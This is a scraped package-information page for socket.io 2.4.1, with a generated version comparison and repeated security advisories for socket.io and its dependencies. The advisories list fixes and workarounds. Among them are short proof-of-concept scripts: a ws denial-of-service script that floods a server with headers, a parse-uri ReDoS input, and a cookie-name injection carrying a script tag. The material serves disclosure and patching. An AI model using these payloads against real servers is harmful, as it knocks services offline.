Version Details and Security Vulnerabilities

📦

socket.io

2.4.1

Comparision Betweeen 2.4.1 and 2.4.0

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

Unpacked Size

55.25 KB

54.35 KB

Version 2.4.1 Details

Socket.IO version 2.4.1 is a minor patch release following version 2.4.0 of this popular Node.js realtime framework server. Examining the package data, the core dependencies remain consistent between the two versions. Both rely on the same versions of 'debug', 'engine.io', 'has-binary2', 'socket.io-client', 'socket.io-parser', and 'socket.io-adapter', suggesting no fundamental changes to the core communication mechanisms or data handling. Similarly, the development dependencies including testing and code coverage tools like 'nyc', 'mocha', 'expect.js', 'supertest', and 'superagent' are identical, indicating a focus on stability and maintaining existing functionality rather than introducing major new features.

The most notable difference lies in the 'dist' section, specifically the 'unpackedSize'. Version 2.4.1 has an unpacked size of 56575 bytes, slightly larger than 2.4.0's 55652 bytes. While seemingly small, this difference indicates code modifications or additions, which could involve bug fixes, performance enhancements, or minor feature tweaks. Developers should consider this update to benefit from potential stability improvements and resolved issues.

Given the "releaseDate" difference of a few days, upgrading from 2.4.0 to 2.4.1 is likely a routine but valuable step to ensure a more refined and potentially more reliable realtime communication experience in your Node.js applications. The update underscores the project's commitment to continuous improvement and addressing minor imperfections. Always consult the official changelog for a comprehensive list of fixes and enhancements when upgrading.

Security Vulnerabilities

This site is an independent open-source project and is not affiliated with, endorsed by, or sponsored by npm, Inc. or GitHub, Inc. The name “npm” is a registered trademark of npm, Inc., used here solely to describe compatibility and reference publicly available npm package data.

Version Details and Security Vulnerabilities

📦

socket.io

2.4.1

Comparision Betweeen 2.4.1 and 2.4.0

Identify the differences between the current version of the package and the previous one.

Version

Dependencies

Dev Dependencies

Peer Dependencies

Distributed Files

Unpacked Size

55.25 KB

54.35 KB

Version 2.4.1 Details

Security Vulnerabilities

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 2.4.1 of the package socket.io.

All Security Vulnerabilities

All the vulnerabilities related to the version 2.4.1 of the package

Summary:

socket.io has an unhandled 'error' event

Details:

Impact

A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.

node:events:502
    throw err; // Unhandled 'error' event
    ^

Error [ERR_UNHANDLED_ERROR]: Unhandled error. (undefined)
    at new NodeError (node:internal/errors:405:5)
    at Socket.emit (node:events:500:17)
    at /myapp/node_modules/socket.io/lib/socket.js:531:14
    at process.processTicksAndRejections (node:internal/process/task_queues:77:11) {
  code: 'ERR_UNHANDLED_ERROR',
  context: undefined
}

Affected versions

| Version range | Needs minor update? | |------------------|------------------------------------------------| | 4.6.2...latest | Nothing to do | | 3.0.0...4.6.1 | Please upgrade to socket.io@4.6.2 (at least) | | 2.3.0...2.5.0 | Please upgrade to socket.io@2.5.1 |

Patches

This issue is fixed by https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115, included in socket.io@4.6.2 (released in May 2023).

The fix was backported in the 2.x branch today: https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c

Workarounds

As a workaround for the affected versions of the socket.io package, you can attach a listener for the "error" event:

io.on("connection", (socket) => {
  socket.on("error", () => {
    // ...
  });
});

For more information

If you have any questions or comments about this advisory:

Open a discussion here

Thanks a lot to Paul Taylor for the responsible disclosure.

References

https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115
https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c

Details about socket.io@2.4.1

Summary:

Regular Expression Denial of Service in debug

Details:

Affected versions of debug are vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter.

As it takes 50,000 characters to block the event loop for 2 seconds, this issue is a low severity issue.

This was later re-introduced in version v3.2.0, and then repatched in versions 3.2.7 and 4.3.1.

Recommendation

Version 2.x.x: Update to version 2.6.9 or later. Version 3.1.x: Update to version 3.1.0 or later. Version 3.2.x: Update to version 3.2.7 or later. Version 4.x.x: Update to version 4.3.1 or later.

Details about debug@4.1.1

Summary:

Resource exhaustion in engine.io

Details:

Engine.IO before 4.0.0 and 3.6.0 allows attackers to cause a denial of service (resource consumption) via a POST request to the long polling transport.

Details about engine.io@3.5.0

Summary:

Uncaught exception in engine.io

Details:

Impact

A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process.

events.js:292
      throw er; // Unhandled 'error' event
      ^

Error: read ECONNRESET
    at TCP.onStreamRead (internal/stream_base_commons.js:209:20)
Emitted 'error' event on Socket instance at:
    at emitErrorNT (internal/streams/destroy.js:106:8)
    at emitErrorCloseNT (internal/streams/destroy.js:74:3)
    at processTicksAndRejections (internal/process/task_queues.js:80:21) {
  errno: -104,
  code: 'ECONNRESET',
  syscall: 'read'
}

This impacts all the users of the engine.io package, including those who uses depending packages like socket.io.

Patches

A fix has been released today (2022/11/20):

| Version range | Fixed version | |-------------------|---------------| | engine.io@3.x.y | 3.6.1 | | engine.io@6.x.y | 6.2.1 |

For socket.io users:

| Version range | engine.io version | Needs minor update? | |-----------------------------|---------------------|--------------------------------------------------------------------------------------------------------| | socket.io@4.5.x | ~6.2.0 | npm audit fix should be sufficient | | socket.io@4.4.x | ~6.1.0 | Please upgrade to socket.io@4.5.x | | socket.io@4.3.x | ~6.0.0 | Please upgrade to socket.io@4.5.x | | socket.io@4.2.x | ~5.2.0 | Please upgrade to socket.io@4.5.x | | socket.io@4.1.x | ~5.1.1 | Please upgrade to socket.io@4.5.x | | socket.io@4.0.x | ~5.0.0 | Please upgrade to socket.io@4.5.x | | socket.io@3.1.x | ~4.1.0 | Please upgrade to socket.io@4.5.x (see here) | | socket.io@3.0.x | ~4.0.0 | Please upgrade to socket.io@4.5.x (see here) | | socket.io@2.5.0 | ~3.6.0 | npm audit fix should be sufficient | | socket.io@2.4.x and below | ~3.5.0 | Please upgrade to socket.io@2.5.0 |

Workarounds

There is no known workaround except upgrading to a safe version.

For more information

If you have any questions or comments about this advisory:

Open an issue in engine.io

Thanks to Jonathan Neve for the responsible disclosure.

Details about engine.io@3.5.0

Summary:

ws affected by a DoS when handling a request with many HTTP headers

Details:

Impact

A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Patches

The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)

Workarounds

In vulnerable versions of ws, the issue can be mitigated in the following ways:

Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
Set server.maxHeadersCount to 0 so that no limit is applied.

Credits

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

References

https://github.com/websockets/ws/issues/2230
https://github.com/websockets/ws/pull/2231

Details about ws@7.4.6

Summary:

cookie accepts cookie name, path, and domain with out of bounds characters

Details:

Impact

The cookie name could be used to set other fields of the cookie, resulting in an unexpected cookie value. For example, serialize("userName=<script>alert('XSS3')</script>; Max-Age=2592000; a", value) would result in "userName=<script>alert('XSS3')</script>; Max-Age=2592000; a=test", setting userName cookie to <script> and ignoring value.

A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie.

Patches

Upgrade to 0.7.0, which updates the validation for name, path, and domain.

Workarounds

Avoid passing untrusted or arbitrary values for these fields, ensure they are set by the application instead of user input.

References

https://github.com/jshttp/cookie/pull/167

Details about cookie@0.4.2

Summary:

parse-uri Regular expression Denial of Service (ReDoS)

Details:

An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.

PoC

async function exploit() {
    const parseuri = require("parse-uri");
    // This input is designed to cause excessive backtracking in the regex
    const craftedInput = 'http://example.com/' + 'a'.repeat(30000) + '?key=value';
    const result = await parseuri(craftedInput);
    }
await exploit();

Details about parseuri@0.0.6

Security Details

Comprehensive list of direct or transitive vulnerabilities for version 2.4.1 of the package socket.io.

All Security Vulnerabilities

All the vulnerabilities related to the version 2.4.1 of the package

Summary:

socket.io has an unhandled 'error' event

Details:

Impact

A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process.

node:events:502
    throw err; // Unhandled 'error' event
    ^

Error [ERR_UNHANDLED_ERROR]: Unhandled error. (undefined)
    at new NodeError (node:internal/errors:405:5)
    at Socket.emit (node:events:500:17)
    at /myapp/node_modules/socket.io/lib/socket.js:531:14
    at process.processTicksAndRejections (node:internal/process/task_queues:77:11) {
  code: 'ERR_UNHANDLED_ERROR',
  context: undefined
}

Affected versions

Patches

This issue is fixed by https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115, included in socket.io@4.6.2 (released in May 2023).

The fix was backported in the 2.x branch today: https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c

Workarounds

As a workaround for the affected versions of the socket.io package, you can attach a listener for the "error" event:

io.on("connection", (socket) => {
  socket.on("error", () => {
    // ...
  });
});

For more information

If you have any questions or comments about this advisory:

Open a discussion here

Thanks a lot to Paul Taylor for the responsible disclosure.

References

https://github.com/socketio/socket.io/commit/15af22fc22bc6030fcead322c106f07640336115
https://github.com/socketio/socket.io/commit/d30630ba10562bf987f4d2b42440fc41a828119c

Details about socket.io@2.4.1

Summary:

Regular Expression Denial of Service in debug

Details:

Affected versions of debug are vulnerable to regular expression denial of service when untrusted user input is passed into the o formatter.

As it takes 50,000 characters to block the event loop for 2 seconds, this issue is a low severity issue.

This was later re-introduced in version v3.2.0, and then repatched in versions 3.2.7 and 4.3.1.

Recommendation

Version 2.x.x: Update to version 2.6.9 or later. Version 3.1.x: Update to version 3.1.0 or later. Version 3.2.x: Update to version 3.2.7 or later. Version 4.x.x: Update to version 4.3.1 or later.

Details about debug@4.1.1

Summary:

Resource exhaustion in engine.io

Details:

Engine.IO before 4.0.0 and 3.6.0 allows attackers to cause a denial of service (resource consumption) via a POST request to the long polling transport.

Details about engine.io@3.5.0

Summary:

Uncaught exception in engine.io

Details:

Impact

A specially crafted HTTP request can trigger an uncaught exception on the Engine.IO server, thus killing the Node.js process.

events.js:292
      throw er; // Unhandled 'error' event
      ^

Error: read ECONNRESET
    at TCP.onStreamRead (internal/stream_base_commons.js:209:20)
Emitted 'error' event on Socket instance at:
    at emitErrorNT (internal/streams/destroy.js:106:8)
    at emitErrorCloseNT (internal/streams/destroy.js:74:3)
    at processTicksAndRejections (internal/process/task_queues.js:80:21) {
  errno: -104,
  code: 'ECONNRESET',
  syscall: 'read'
}

This impacts all the users of the engine.io package, including those who uses depending packages like socket.io.

Patches

A fix has been released today (2022/11/20):

| Version range | Fixed version | |-------------------|---------------| | engine.io@3.x.y | 3.6.1 | | engine.io@6.x.y | 6.2.1 |

For socket.io users:

Workarounds

There is no known workaround except upgrading to a safe version.

For more information

If you have any questions or comments about this advisory:

Open an issue in engine.io

Thanks to Jonathan Neve for the responsible disclosure.

Details about engine.io@3.5.0

Summary:

ws affected by a DoS when handling a request with many HTTP headers

Details:

Impact

A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.

Proof of concept

const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});

Patches

Workarounds

In vulnerable versions of ws, the issue can be mitigated in the following ways:

Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.
Set server.maxHeadersCount to 0 so that no limit is applied.

Credits

The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.

References

https://github.com/websockets/ws/issues/2230
https://github.com/websockets/ws/pull/2231

Details about ws@7.4.6

Summary:

cookie accepts cookie name, path, and domain with out of bounds characters

Details:

Impact

A similar escape can be used for path and domain, which could be abused to alter other fields of the cookie.

Patches

Upgrade to 0.7.0, which updates the validation for name, path, and domain.

Workarounds

Avoid passing untrusted or arbitrary values for these fields, ensure they are set by the application instead of user input.

References

https://github.com/jshttp/cookie/pull/167

Details about cookie@0.4.2

Summary:

parse-uri Regular expression Denial of Service (ReDoS)

Details:

An issue in parse-uri v1.0.9 allows attackers to cause a Regular expression Denial of Service (ReDoS) via a crafted URL.

PoC

async function exploit() {
    const parseuri = require("parse-uri");
    // This input is designed to cause excessive backtracking in the regex
    const craftedInput = 'http://example.com/' + 'a'.repeat(30000) + '?key=value';
    const result = await parseuri(craftedInput);
    }
await exploit();

Details about parseuri@0.0.6

Version Details and Security Vulnerabilities

socket.io

Comparision Betweeen 2.4.1 and 2.4.0

Version 2.4.1 Details

Security Vulnerabilities

Version Details and Security Vulnerabilities

socket.io

Comparision Betweeen 2.4.1 and 2.4.0

Version 2.4.1 Details

Security Vulnerabilities

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

socket.io@2.4.1 GHSA-25hc-qcg6-38wj 6.9

Impact

Affected versions

Patches

Workarounds

For more information

References

debug@4.1.1 GHSA-gxpj-cx7g-858c 3.7

Recommendation

engine.io@3.5.0 GHSA-j4f2-536g-r55m 7.5

engine.io@3.5.0 GHSA-r7qp-cfhv-p84w 6.5

Impact

Patches

Workarounds

For more information

ws@7.4.6 GHSA-3h5v-q93c-6h6q 8.7

Impact

Proof of concept

Patches

Workarounds

Credits

References

cookie@0.4.2 GHSA-pxg6-pf52-xh8x N/A

Impact

Patches

Workarounds

References

parseuri@0.0.6 GHSA-6fx8-h7jm-663j 6.9

PoC

Security Details

All

Transitive Dependencies

Package

All Security Vulnerabilities

socket.io@2.4.1 GHSA-25hc-qcg6-38wj 6.9

Impact

Affected versions

Patches

Workarounds

For more information

References

debug@4.1.1 GHSA-gxpj-cx7g-858c 3.7

Recommendation

engine.io@3.5.0 GHSA-j4f2-536g-r55m 7.5

engine.io@3.5.0 GHSA-r7qp-cfhv-p84w 6.5

Impact

Patches

Workarounds

For more information

ws@7.4.6 GHSA-3h5v-q93c-6h6q 8.7

Impact

Proof of concept

Patches

Workarounds

Credits

References

cookie@0.4.2 GHSA-pxg6-pf52-xh8x N/A

Impact

Patches

Workarounds

References

parseuri@0.0.6 GHSA-6fx8-h7jm-663j 6.9

PoC